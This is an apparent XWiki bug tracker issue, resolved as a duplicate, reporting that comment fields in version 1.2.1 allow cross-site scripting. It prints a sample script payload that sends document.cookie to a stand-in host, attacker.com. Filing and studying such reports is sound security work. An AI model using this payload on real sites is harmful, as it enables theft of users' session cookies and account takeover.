Details
-
Bug
-
Resolution: Duplicate
-
Major
-
None
-
1.2.1
-
None
-
security
-
Description
XWiki Comments are vulnerable to XSS.
Writing something like this in a comment field would permit an attacker to steal user's authentication cookies:
<script>
document.write('<IFRAME SRC="http://attacker.com/evil?cookie='document.cookie'"></IFRAME>')
</script>
Attachments
Issue Links
- depends on
-
XWIKI-7878 Add a 'restricted' parameter to transformation context to enable a safe rendering mode
- Closed
- is duplicated by
-
XWIKI-4875 Security issue: Arbitrary HTML code can be used in comments
- Closed